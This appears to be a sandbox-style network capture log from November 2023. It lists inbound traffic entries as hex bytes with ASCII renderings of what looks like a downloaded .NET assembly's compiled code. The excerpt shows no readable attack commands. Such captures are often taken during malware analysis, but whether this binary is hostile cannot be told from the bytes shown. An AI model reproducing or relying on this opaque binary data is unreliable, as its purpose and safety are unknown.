2023-11-18 09:02:35 UTC	400	IN	Data Raw: 00 0a 6f 28 00 00 0a 0d 2b 41 09 6f 29 00 00 0a 74 1b 00 00 01 08 2c 04 16 0c 2b 0c 06 72 39 00 00 70 6f 22 00 00 0a 26 25 6f 2a 00 00 0a 07 6f 25 00 00 0a 06 72 3f 00 00 70 6f 22 00 00 0a 26 6f 2b 00 00 0a 07 6f 25 00 00 0a 09 6f 13 00 00 0a 2d b7 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 2c 2a 07 16 8c a3 00 00 01 1f 0b 6f 73 01 00 06 13 04 06 11 04 6f 2c 00 00 0a 6f 22 00 00 0a 26 06 72 47 00 00 70 6f 22 00 00 0a 26 06 6f 26 00 00 0a 26 06 72 51 00 00 70 6f 22 00 00 0a 26 02 6f 2d 00 00 0a 07 6f 25 00 00 0a 06 72 5f 00 00 70 6f 2e 00 00 0a 26 06 02 07 02 6f 21 00 00 0a 16 28 07 00 00 06 03 07 6f 70 01 00 06 51 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 5f 00 4d ac 00 0a 00 00 00 00 13 30 05 00 6e 00 00 00 02 00 00 11 7e 01 00 00 04 73 20 00 00 0a 25 02 16 72 Data Ascii: o(+Ao)t,+r9po"&%oo%r?po"&o+o%o-,o,oso,o"&rGpo"&o&&rQpo"&o-o%r_po.&o!(opQo/*_M0n~s %r
2023-11-18 09:02:35 UTC	401	IN	Data Raw: ff de 6f 12 05 fe 16 0b 00 00 1b 6f 12 00 00 0a dc 0e 04 2c 37 02 72 71 01 00 70 6f 22 00 00 0a 26 02 72 ce 02 00 70 28 f2 00 00 06 6f 22 00 00 0a 26 02 72 3f 00 00 70 6f 22 00 00 0a 26 02 72 7d 01 00 70 6f 2e 00 00 0a 26 2b 26 72 da 02 00 70 09 2d 07 72 19 02 00 70 2b 06 09 6f 34 00 00 0a 06 6f 40 00 00 0a 28 41 00 00 0a 73 42 00 00 0a 7a 02 72 5f 00 00 70 6f 2e 00 00 0a 26 2a 00 01 10 00 00 02 00 0c 01 9b a7 01 0e 00 00 00 00 2e 20 00 01 00 00 80 01 00 00 04 2a 1e 02 28 44 00 00 0a 2a 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0c 00 00 06 06 6f 2f 00 00 0a 2a 22 02 03 6f 0a 00 00 06 2a 00 00 00 13 30 02 00 14 00 00 00 07 00 00 11 73 45 00 00 0a 0a 02 06 6f 0a 00 00 06 06 6f 2f 00 00 0a 2a 6a 02 7b 02 00 00 04 2d 0b 02 73 46 00 00 0a Data Ascii: oo,7rqpo"&rp(o"&r?po"&r}po.&+&rp-rp+o4o@(AsBzr_po.&. (D0sEoo/"o0sEoo/j{-sF
2023-11-18 09:02:35 UTC	402	IN	Data Raw: 00 11 00 00 00 0e 00 00 00 1d 00 00 00 14 00 00 00 17 00 00 00 1a 00 00 00 20 00 00 00 2b 21 17 2a 19 2a 18 2a 1c 2a 1d 2a 1e 2a 1f 0f 2a 1f 09 2a 1f 0a 2a 1f 0b 2a 1f 0c 2a 1f 0e 2a 1f 10 2a 72 cc 03 00 70 02 8c 1f 00 00 01 28 70 00 00 0a 73 71 00 00 0a 7a 00 13 30 04 00 2f 00 00 00 0f 00 00 11 02 6f 72 00 00 0a 03 16 12 00 6f 73 00 00 0a 2c 1c 06 6f 74 00 00 0a 2c 14 06 6f 75 00 00 0a 2d 0c 06 6f 74 00 00 0a a5 19 00 00 1b 2a 04 2a 72 02 6f 65 00 00 0a 74 7e 00 00 01 6f 76 00 00 0a 03 28 35 00 00 06 6f 77 00 00 0a 2a 1b 30 02 00 3a 00 00 00 10 00 00 11 02 6f 78 00 00 0a 0a 2b 19 06 6f 79 00 00 0a 0b 07 6f 7a 00 00 0a 03 28 7b 00 00 0a 2c 04 07 0c de 16 06 6f 13 00 00 0a 2d df de 0a 06 2c 06 06 6f 12 00 00 0a dc 14 2a 08 2a 00 00 01 10 00 00 02 00 07 00 Data Ascii: +!***********rp(psqz0/oros,ot,ou-otroet~ov(5ow0:ox+oyoz({,o-,o*
2023-11-18 09:02:35 UTC	404	IN	Data Raw: 00 11 02 03 6f 94 00 00 0a 28 7a 00 00 06 02 03 6f 95 00 00 0a 28 79 00 00 06 0a 06 60 2a 36 02 03 6f 96 00 00 0a 28 7c 00 00 06 2a 00 00 13 30 03 00 30 00 00 00 14 00 00 11 02 03 6f 97 00 00 0a 6f 98 00 00 0a 28 79 00 00 06 02 03 6f 99 00 00 0a 28 7c 00 00 06 0a 02 03 6f 9a 00 00 0a 28 77 00 00 06 0b 06 60 07 60 2a 13 30 03 00 1c 00 00 00 15 00 00 11 02 03 6f 90 00 00 0a 28 79 00 00 06 02 03 6f 91 00 00 0a 28 79 00 00 06 0a 06 60 2a 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9b 00 00 0a 28 7a 00 00 06 02 03 6f 9c 00 00 0a 28 7a 00 00 06 0a 02 03 6f 9d 00 00 0a 28 79 00 00 06 0b 06 60 07 60 2a 00 13 30 03 00 2b 00 00 00 14 00 00 11 02 03 6f 9e 00 00 0a 28 79 00 00 06 02 03 6f 9f 00 00 0a 28 79 00 00 06 0a 02 03 6f a0 00 00 0a 28 79 00 00 06 0b 06 60 07 Data Ascii: o(zo(y`6o(\|00oo(yo(\|o(w``0o(yo(y`0+o(zo(zo(y``*0+o(yo(yo(y`
2023-11-18 09:02:35 UTC	405	IN	Data Raw: 6f c0 00 00 0a 25 72 1e 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 28 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 34 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 3c 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 46 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 54 06 00 70 14 fe 06 d5 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 62 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 72 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 84 06 00 70 14 fe 06 d3 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 94 06 00 70 14 fe 06 d4 00 00 06 73 c4 01 00 06 6f c0 00 00 0a 25 72 a6 06 00 70 14 fe 06 ce 00 00 06 73 c4 01 00 06 6f c0 Data Ascii: o%rpso%r(pso%r4pso%r<pso%rFpso%rTpso%rbpso%rrpso%rpso%rpso%rpso
2023-11-18 09:02:35 UTC	406	IN	Data Raw: 17 54 07 2a 1b 30 03 00 2d 00 00 00 1b 00 00 11 20 00 04 00 00 73 20 00 00 0a 0a 06 73 14 01 00 06 0b 03 07 02 6f 0e 00 00 06 de 0a 07 2c 06 07 6f 12 00 00 0a dc 06 6f 2f 00 00 0a 2a 00 00 00 01 10 00 00 02 00 12 00 0a 1c 00 0a 00 00 00 00 1b 30 04 00 9c 01 00 00 1c 00 00 11 7e 58 00 00 04 73 ce 00 00 0a 0a 02 03 06 28 85 00 00 06 2c 0e 06 6f cf 00 00 0a 28 07 00 00 2b 16 30 05 04 14 51 16 2a 73 4a 00 00 06 0b 17 0c 06 6f cf 00 00 0a 6f d1 00 00 0a 0d 38 3f 01 00 00 09 6f d2 00 00 0a 13 04 06 11 04 6f d3 00 00 0a 13 05 08 2d 0d 07 72 e4 08 00 70 6f 46 00 00 06 2b 02 16 0c 11 05 7e 5a 00 00 04 25 2d 17 26 7e 59 00 00 04 fe 06 ce 01 00 06 73 d4 00 00 0a 25 80 5a 00 00 04 28 08 00 00 2b 13 06 11 06 28 07 00 00 2b 13 07 11 07 17 33 26 02 11 04 07 28 f1 00 00 Data Ascii: T0- s so,oo/0~Xs(,o(+0Q*sJoo8?oo-rpoF+~Z%-&~Ys%Z(+(+3&(
2023-11-18 09:02:35 UTC	408	IN	Data Raw: 28 bc 00 00 06 0a 2b 06 73 88 00 00 0a 7a 06 2a 00 00 00 13 30 05 00 d2 02 00 00 1f 00 00 11 73 4a 00 00 06 0a 03 6f c8 00 00 0a 12 01 28 2e 00 00 06 39 b2 02 00 00 07 45 0f 00 00 00 1b 00 00 00 31 00 00 00 55 00 00 00 6b 00 00 00 cd 00 00 00 64 01 00 00 88 01 00 00 06 02 00 00 6a 02 00 00 dd 01 00 00 05 00 00 00 f3 01 00 00 27 02 00 00 5f 02 00 00 54 02 00 00 38 65 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 5b 02 00 00 03 6f da 00 00 0a 74 34 00 00 1b 06 28 fa 00 00 06 38 45 02 00 00 06 03 6f da 00 00 0a a5 ae 00 00 01 2d 07 72 d6 09 00 70 2b 05 72 da 09 00 70 6f 46 00 00 06 38 21 02 00 00 06 03 6f da 00 00 0a 6f 2f 00 00 0a 6f 46 00 00 06 38 0b 02 00 00 02 7b 15 00 00 04 7b 3d 00 00 04 28 e7 00 00 06 03 6f da 00 00 0a a5 b3 00 00 01 Data Ascii: (+sz*0sJo(.9E1Ukdj'_T8eoo/oF8[ot4(8Eo-rp+rpoF8!oo/oF8{{=(o
2023-11-18 09:02:35 UTC	409	IN	Data Raw: 3b 01 00 06 03 6f c8 00 00 0a 28 0d 00 00 2b 6f 66 00 00 0a 28 0e 00 00 2b 03 6f 9a 00 00 0a 28 fb 00 00 06 0c 08 2c 37 02 07 03 6f 97 00 00 0a 6f e5 00 00 0a 03 6f 97 00 00 0a 6f e6 00 00 0a 16 12 00 28 e6 00 00 06 0d 02 09 03 6f 97 00 00 0a 6f e5 00 00 0a 06 16 28 e3 00 00 06 2b 02 07 0d 6f 6a 00 00 0a 6f e9 00 00 0a 8c 36 00 00 1b 13 04 11 04 6f 13 00 00 0a 26 7e ea 00 00 0a 13 05 03 6f 99 00 00 0a 6f d1 00 00 0a 13 06 38 42 01 00 00 11 06 6f d2 00 00 0a 11 04 6f eb 00 00 0a 6f 34 00 00 0a 28 f2 00 00 06 13 07 09 6f 0b 01 00 06 11 05 6f 46 00 00 06 02 6f 06 00 00 2b 13 08 08 2d 54 09 6f 08 01 00 06 11 05 6f 46 00 00 06 09 6f 08 01 00 06 6f 47 00 00 06 09 6f 08 01 00 06 11 08 6f 46 00 00 06 09 6f 08 01 00 06 72 62 0a 00 70 6f 46 00 00 06 09 6f 08 01 00 Data Ascii: ;o(+of(+o(,7oooo(oo(+ojo6o&~oo8Booo4(ooFo+-TooFooGooForbpoFo
2023-11-18 09:02:35 UTC	410	IN	Data Raw: 00 00 0a 75 53 00 00 01 0a 06 2c 0d 06 6f b8 00 00 0a 02 6f 06 00 00 2b 2a 03 6f b8 00 00 0a 75 38 00 00 01 0b 07 2c 09 02 07 17 28 be 00 00 06 2a 03 6f b8 00 00 0a 75 52 00 00 01 0c 08 2c 09 02 08 17 28 c0 00 00 06 2a 03 6f b8 00 00 0a 75 51 00 00 01 0d 09 2c 22 09 6f bc 00 00 0a 1f 0d 33 18 02 72 cc 09 00 70 09 6f 90 00 00 0a 09 6f 91 00 00 0a 28 bc 00 00 06 2a 73 4a 00 00 06 25 72 18 0b 00 70 6f 46 00 00 06 25 03 6f b8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 46 73 4a 00 00 06 25 72 26 0b 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 27 00 00 00 19 00 00 11 14 0a 02 03 12 00 28 8f 00 00 06 2c 02 06 2a 02 72 e4 08 00 70 03 6f 90 00 00 0a 03 6f 91 00 00 0a 28 bc 00 00 06 2a 72 73 4a 00 00 06 25 72 30 0b 00 70 03 6f f3 Data Ascii: uS,oo+ou8,(ouR,(ouQ,"o3rpoo(sJ%rpoF%oo+oF%rpoFFsJ%r&poF0'(,rpoo(rsJ%r0po
2023-11-18 09:02:35 UTC	412	IN	Data Raw: 02 7b 1b 00 00 04 2c 06 73 c9 00 00 0a 7a 02 17 7d 1b 00 00 04 02 7b 1a 00 00 04 03 6f fa 00 00 0a 6f 3c 01 00 06 0a 02 28 81 00 00 06 6f 02 01 00 06 06 6f fb 00 00 0a 2d 12 02 28 81 00 00 06 6f 03 01 00 06 06 17 6f fc 00 00 0a 06 2a 00 00 13 30 03 00 5a 00 00 00 2d 00 00 11 73 4a 00 00 06 0a 03 75 7b 00 00 01 0b 07 2d 06 73 c9 00 00 0a 7a 02 06 07 6f fd 00 00 0a 28 f9 00 00 06 06 72 d3 00 00 70 6f 46 00 00 06 07 0c 08 2c 13 08 6f fe 00 00 0a 2c 0b 06 72 74 0b 00 70 6f 46 00 00 06 06 04 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 06 2a 00 00 13 30 03 00 79 00 00 00 12 00 00 11 73 4a 00 00 06 0a 02 04 28 ee 00 00 06 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 04 28 ee 00 00 06 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 Data Ascii: {,sz}{oo<(oo-(oo0Z-sJu{-szo(rpoF,o,rtpoFoFrpoF0ysJ(,rpoFo+oF(,rpoF
2023-11-18 09:02:35 UTC	413	IN	Data Raw: ed 00 00 06 2d 0f 02 11 05 6f 24 00 00 0a 28 eb 00 00 06 2b 07 17 2b 04 16 2b 01 17 13 06 02 7b 17 00 00 04 11 06 2d 03 16 2b 01 17 6f 04 01 00 0a 06 6f 02 01 00 06 6f 47 00 00 0a 13 07 11 05 6f 24 00 00 0a 02 6f 06 00 00 2b 13 08 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 11 08 06 11 05 11 07 28 c2 00 00 06 05 0b 16 0c 11 04 17 58 13 04 11 04 09 3f 34 ff ff ff 04 1f 10 2e 0a 04 1f 15 2e 05 04 1f 1b 33 3b 06 6f 09 01 00 06 72 82 0c 00 70 6f 46 00 00 06 02 7b 17 00 00 04 16 6f 04 01 00 0a 06 6f 09 01 00 06 0e 04 02 6f 06 00 00 2b 6f 46 00 00 06 02 7b 17 00 00 04 6f 05 01 00 0a 26 02 7b 1a 00 00 04 6f 3a 01 00 06 02 28 82 00 00 06 2d 0c 02 7b 16 00 00 04 6f ee 00 00 0a 26 06 2a 00 13 30 04 00 cf 01 00 00 31 00 00 11 14 0a 04 03 3b 42 01 00 00 03 75 0c 00 00 02 Data Ascii: -o$(+++{-+oooGo$o+{o&(X?4..3;orpoF{ooo+oF{o&{o:(-{o&*01;Bu
2023-11-18 09:02:35 UTC	414	IN	Data Raw: 00 00 00 36 02 7e 1c 00 00 04 03 28 cc 00 00 06 2a 36 02 7e 1d 00 00 04 03 28 cc 00 00 06 2a de 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 09 01 00 0a 2d 0b 72 42 0d 00 70 73 71 00 00 0a 7a 03 04 6f 08 01 00 0a 6f cd 00 00 0a 6f 0a 01 00 0a 02 04 6f c5 01 00 06 2a 13 30 04 00 bb 00 00 00 12 00 00 11 73 4a 00 00 06 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 31 34 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 04 2c 0b 06 72 d7 00 00 70 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 06 7e 1e 00 00 04 03 6f 08 01 00 0a 6f cd 00 00 0a 6f 0b 01 00 0a 6f 46 00 00 06 06 72 7e 0c 00 70 6f 46 00 00 06 04 2c 0b 06 72 d3 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 03 6f 96 00 00 0a 6f d9 00 00 0a 17 59 6f Data Ascii: 6~(6~(ooo-rBpsqzoooo*0sJoo14,rpoFooo+oF,rpoFr~poF~ooooFr~poF,rpoFoooYo
2023-11-18 09:02:35 UTC	415	IN	Data Raw: 06 00 00 2b 28 70 00 00 0a 6f 46 00 00 06 2b 18 07 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 07 72 b1 11 00 70 6f 46 00 00 06 07 2a 36 02 03 72 92 15 00 70 6f c8 00 00 06 2a 46 73 4a 00 00 06 25 72 a6 15 00 70 6f 46 00 00 06 2a d2 73 4a 00 00 06 25 72 c4 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 13 30 03 00 74 00 00 00 12 00 00 11 73 4a 00 00 06 0a 06 72 Data Ascii: +(poF+ooo+oFrpoF6rpoFsJ%rpoFsJ%rpoF%ooo+oF%rpoF0tsJr
2023-11-18 09:02:35 UTC	416	IN	Data Raw: d4 15 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 03 6f 96 00 00 0a 6f d9 00 00 0a 18 33 30 06 72 39 00 00 70 6f 46 00 00 06 06 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 06 72 d7 00 00 70 6f 46 00 00 06 2b 0b 06 72 e2 15 00 70 6f 46 00 00 06 06 2a d2 73 4a 00 00 06 25 72 ec 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 00 70 6f 46 00 00 06 2a 00 00 00 13 30 04 00 57 00 00 00 00 00 00 00 73 4a 00 00 06 25 72 f8 15 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 16 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 08 16 00 70 6f 46 00 00 06 25 03 6f 96 00 00 0a 17 6f d8 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 25 72 d7 00 Data Ascii: poFooo+oFoo30r9poFooo+oFrpoF+rpoFsJ%rpoF%ooo+oF%rpoF0WsJ%rpoF%ooo+oF%rpoF%ooo+oF%r
2023-11-18 09:02:35 UTC	417	IN	Data Raw: 05 03 6f 02 01 00 06 16 6f ff 00 00 0a 2e 3a 03 6f 02 01 00 06 05 6f 4e 00 00 0a 03 6f 09 01 00 06 72 62 0a 00 70 6f 46 00 00 06 03 6f 09 01 00 06 05 6f 46 00 00 06 02 7b 18 00 00 04 05 6f 30 01 00 06 16 6f 0e 01 00 0a 0e 04 2c 0d 02 7b 1a 00 00 04 04 05 6f 3b 01 00 06 2a 1b 30 03 00 88 00 00 00 3a 00 00 11 7e ea 00 00 0a 0a 04 6f 12 01 00 0a 0b 2b 64 07 6f 13 01 00 0a 0c 03 06 6f 46 00 00 06 03 08 6f b6 00 00 0a 02 6f 06 00 00 2b 6f 46 00 00 06 08 6f 14 01 00 0a 28 cc 00 00 0a 2d 17 03 72 3e 16 00 70 6f 46 00 00 06 03 08 6f 14 01 00 0a 6f 46 00 00 06 03 08 6f 15 01 00 0a 2d 07 72 52 16 00 70 2b 05 72 5e 16 00 70 6f 46 00 00 06 72 39 00 00 70 0a 07 6f 13 00 00 0a 2d 94 de 0a 07 2c 06 07 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 0d 00 70 7d 00 0a 00 00 00 00 Data Ascii: oo.:ooNorbpoFooF{o0o,{o;0:~o+dooFoo+oFo(-r>poFooFo-rRp+r^poFr9po-,op}
2023-11-18 09:02:35 UTC	418	IN	Data Raw: 00 00 04 1f 0f 2e 4f 04 1f 14 2e 7d 38 2b 01 00 00 04 1f 2d 30 15 04 1f 1f 3b 9e 00 00 00 04 1f 2d 3b a0 00 00 00 38 11 01 00 00 04 1f 33 3b ae 00 00 00 04 1f 34 3b d9 00 00 00 38 fc 00 00 00 03 6f 04 01 00 06 2d 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0a 01 00 06 6f 48 00 00 06 2c 17 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 Data Ascii: .O.}8+-0;-;83;4;8o-ooHooH,$ooH,ooH,oooH,$ooH
2023-11-18 09:02:35 UTC	418	IN	Data Raw: 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f 04 01 00 06 14 fe 01 2a 16 2a 03 6f 04 01 00 06 14 fe 01 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0b 01 00 06 6f 48 00 00 06 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 24 03 6f 0b 01 00 06 6f 48 00 00 06 2c 17 03 6f 0c 01 00 06 6f 48 00 00 06 2c 0a 03 6f fe 00 00 06 16 fe 01 2a 16 2a 03 6f 08 01 00 06 6f 48 00 00 06 2c 19 03 6f 0b 01 00 06 6f 48 00 00 06 2c 0c 03 6f 0c 01 00 06 6f 48 00 00 06 2a 16 2a 73 88 00 00 0a 7a 96 03 6f bc 00 00 0a 1b 33 13 04 02 03 74 54 00 00 01 6f 1a 01 00 0a 6f 46 00 00 06 2a 02 03 04 28 f1 00 00 06 2a ee 02 03 28 ee 00 00 06 2c 24 04 72 d3 00 00 70 6f 46 00 00 06 04 03 02 6f 06 00 00 2b 6f 46 00 00 06 04 72 d7 00 00 70 6f 46 00 00 06 2a 04 03 02 6f 06 00 00 Data Ascii: ,ooH,o*oooH,ooHooH,$ooH,ooH,oooH,ooH,ooH*szo3tTooF((,$rpoFo+oFrpoFo
2023-11-18 09:02:35 UTC	420	IN	Data Raw: 2a 6a 02 7b 23 00 00 04 2d 0b 02 73 46 00 00 0a 7d 23 00 00 04 02 7b 23 00 00 04 2a 6a 02 7b 24 00 00 04 2d 0b 02 73 1e 01 00 0a 7d 24 00 00 04 02 7b 24 00 00 04 2a 1e 02 7b 25 00 00 04 2a 22 02 03 7d 25 00 00 04 2a 1e 02 7b 26 00 00 04 2a 22 02 03 7d 26 00 00 04 2a 1e 02 7b 27 00 00 04 2a 1e 02 7b 28 00 00 04 2a 6a 02 7b 29 00 00 04 2d 0b 02 73 4a 00 00 06 7d 29 00 00 04 02 7b 29 00 00 04 2a 6a 02 7b 2a 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2a 00 00 04 02 7b 2a 00 00 04 2a 6a 02 7b 2b 00 00 04 2d 0b 02 73 4a 00 00 06 7d 2b 00 00 04 02 7b 2b 00 00 04 2a 1e 02 7b 2c 00 00 04 2a 22 02 03 7d 2c 00 00 04 2a b6 02 7b 2b 00 00 04 2c 0f 02 7b 2b 00 00 04 6f 48 00 00 06 2d 02 17 2a 02 7b 25 00 00 04 2c 02 17 2a 02 7b 26 00 00 04 2c 02 17 2a 16 2a 00 00 1b 30 03 00 Data Ascii: j{#-sF}#{#j{$-s}${${%"}%{&"}&{'{(j{)-sJ}){)j{-sJ}{*j{+-sJ}+{+{,"},{+,{+oH-{%,{&,**0
2023-11-18 09:02:35 UTC	421	IN	Data Raw: 00 0a dc 06 6f 2f 00 00 0a 2a 01 10 00 00 02 00 33 00 30 63 00 0a 00 00 00 00 c2 02 6f df 00 00 0a 1f 0a 58 18 58 73 20 00 00 0a 02 6f 22 00 00 0a 1f 5b 6f 2f 01 00 0a 03 6f 30 01 00 0a 1f 5d 6f 2f 01 00 0a 6f 2f 00 00 0a 2a 36 28 7f 00 00 0a 02 03 28 31 01 00 0a 2a 42 02 28 7f 00 00 0a 03 04 6f 32 01 00 0a 26 02 2a 13 30 02 00 21 00 00 00 40 00 00 11 02 6f 26 00 00 0a 26 16 0a 2b 10 02 72 42 18 00 70 6f 22 00 00 0a 26 06 17 58 0a 06 03 32 ec 02 2a 7e 28 7f 00 00 0a 72 4e 03 00 70 17 8d 12 00 00 01 25 16 02 8c 19 00 00 1b a2 28 31 01 00 0a 2a 22 02 16 28 1e 01 00 06 2a 00 00 13 30 02 00 26 00 00 00 40 00 00 11 02 2c 21 03 0a 2b 14 02 06 6f 33 01 00 0a 28 34 01 00 0a 2d 02 16 2a 06 17 58 0a 06 02 6f df 00 00 0a 32 e3 17 2a 00 00 13 30 02 00 2f 00 00 00 40 Data Ascii: o/30coXXs o"[o/o0]o/o/6((1B(o2&0!@o&&+rBpo"&X2~(rNp%(1"(0&@,!+o3(4-Xo2*0/@
2023-11-18 09:02:35 UTC	422	IN	Data Raw: 01 00 0a 2a 32 02 28 4c 01 00 06 73 42 01 00 0a 2a 32 02 28 4c 01 00 06 73 43 01 00 0a 2a 32 02 28 4c 01 00 06 73 44 01 00 0a 2a 32 02 28 4c 01 00 06 73 45 01 00 0a 2a 32 02 28 4c 01 00 06 73 46 01 00 0a 2a 13 30 07 00 b5 00 00 00 47 00 00 11 03 d0 91 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2d 12 03 d0 90 00 00 01 28 47 01 00 0a 28 48 01 00 0a 2c 55 7e 41 00 00 04 0a 28 49 01 00 0a 2c 46 28 4a 01 00 0a 72 78 18 00 70 18 8d 12 00 00 01 25 16 06 2d 07 72 fb 18 00 70 2b 06 06 6f 2f 00 00 0a a2 25 17 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a 28 4d 01 00 0a 06 2a 28 49 01 00 0a 2c 33 28 4a 01 00 0a 72 09 19 00 70 17 8d 12 00 00 01 25 16 03 14 28 4b 01 00 0a 2d 07 72 fb 18 00 70 2b 06 03 6f 2f 00 00 0a a2 28 4c 01 00 0a Data Ascii: 2(LsB2(LsC2(LsD2(LsE2(LsF0G(G(H-(G(H,U~A(I,F(Jrxp%-rp+o/%(K-rp+o/(L(M*(I,3(Jrp%(K-rp+o/(L
2023-11-18 09:02:35 UTC	424	IN	Data Raw: 00 00 06 72 5e 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 61 01 00 00 06 72 54 17 00 70 28 7b 00 00 0a 3a 98 00 00 00 38 4c 01 00 00 06 72 27 1c 00 70 28 7b 00 00 0a 3a 8a 00 00 00 38 37 01 00 00 06 72 37 1c 00 70 28 7b 00 00 0a 3a 90 00 00 00 38 22 01 00 00 06 72 41 1c 00 70 28 7b 00 00 0a 3a 96 00 00 00 38 0d 01 00 00 06 72 53 1c 00 70 28 7b 00 00 0a 3a 99 00 00 00 38 f8 00 00 00 06 72 5f 1c 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 e3 00 00 00 06 72 69 1c 00 70 28 7b 00 00 0a 3a 9c 00 00 00 38 ce 00 00 00 06 72 02 17 00 70 28 7b 00 00 0a 3a ad 00 00 00 38 b9 00 00 00 07 28 5e 01 00 0a 2a 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 16 13 04 38 a8 00 00 00 1f 0c 13 06 03 12 02 28 d5 01 00 06 16 fe 01 13 05 16 0d 17 13 04 38 8d 00 00 00 1f 0c 13 Data Ascii: r^p({:8arTp({:8Lr'p({:87r7p({:8"rAp({:8rSp({:8r_p({:8rip({:8rp({:8(^*(8(8
2023-11-18 09:02:35 UTC	425	IN	Data Raw: 67 01 00 0a 16 16 28 63 01 00 0a 13 0e 2b 1b 02 28 66 01 00 0a 72 27 1c 00 70 6f 67 01 00 0a 16 16 11 0d 28 62 01 00 0a 13 0e 11 0e 2a 02 28 66 01 00 0a 72 02 17 00 70 6f 67 01 00 0a 28 5e 01 00 0a 2a 72 89 1c 00 70 03 06 6f 6c 00 00 0a 8c 1f 00 00 01 28 41 00 00 0a 73 42 00 00 0a 7a 2e 72 32 1d 00 70 28 5a 01 00 06 2a 2e 72 b5 1d 00 70 28 5a 01 00 06 2a 46 28 69 01 00 0a 02 6f 6a 01 00 0a 28 6b 01 00 0a 2a 00 00 13 30 03 00 11 00 00 00 4b 00 00 11 02 03 04 28 5c 01 00 06 0a 02 06 6f 6c 01 00 0a 2a 00 00 00 1b 30 05 00 73 01 00 00 4c 00 00 11 03 2d 0b 72 40 1e 00 70 73 1c 01 00 0a 7a 04 2d 0b 72 52 1e 00 70 73 1c 01 00 0a 7a 73 41 01 00 0a 0a 06 03 74 14 00 00 02 04 12 01 12 02 28 8b 00 00 06 6f 6d 01 00 0a 06 08 6f 6e 01 00 0a 14 0d 04 75 77 00 00 01 2c Data Ascii: g(c+(fr'pog(b(frpog(^rpol(AsBz.r2p(Z.rp(ZF(ioj(k0K(\ol0sL-r@psz-rRpszsAt(omonuw,
2023-11-18 09:02:35 UTC	426	IN	Data Raw: 8a 1f 00 70 06 08 9a 28 70 00 00 0a 28 65 01 00 06 de 0a 09 2c 06 09 6f 12 00 00 0a dc 08 17 58 0c 08 06 8e 69 32 cb 03 6f 94 01 00 0a 13 04 11 04 28 6d 01 00 06 6f 6d 01 00 0a 11 04 6f 95 01 00 0a 26 11 04 28 6c 01 00 06 6f 6d 01 00 0a 11 04 6f 95 01 00 0a 26 de 0c 11 04 2c 07 11 04 6f 12 00 00 0a dc 2a 01 28 00 00 02 00 71 00 15 86 00 0a 00 00 00 00 02 00 9e 00 17 b5 00 0a 00 00 00 00 02 00 d1 00 2a fb 00 0c 00 00 00 00 1b 30 06 00 8b 01 00 00 51 00 00 11 73 45 00 00 0a 0a 73 42 01 00 0a 0b 03 6f 94 01 00 0a 0c 73 96 01 00 0a 0d 06 28 7f 00 00 0a 72 9e 1f 00 70 07 05 6f 97 01 00 0a 6f 98 01 00 0a 26 7e 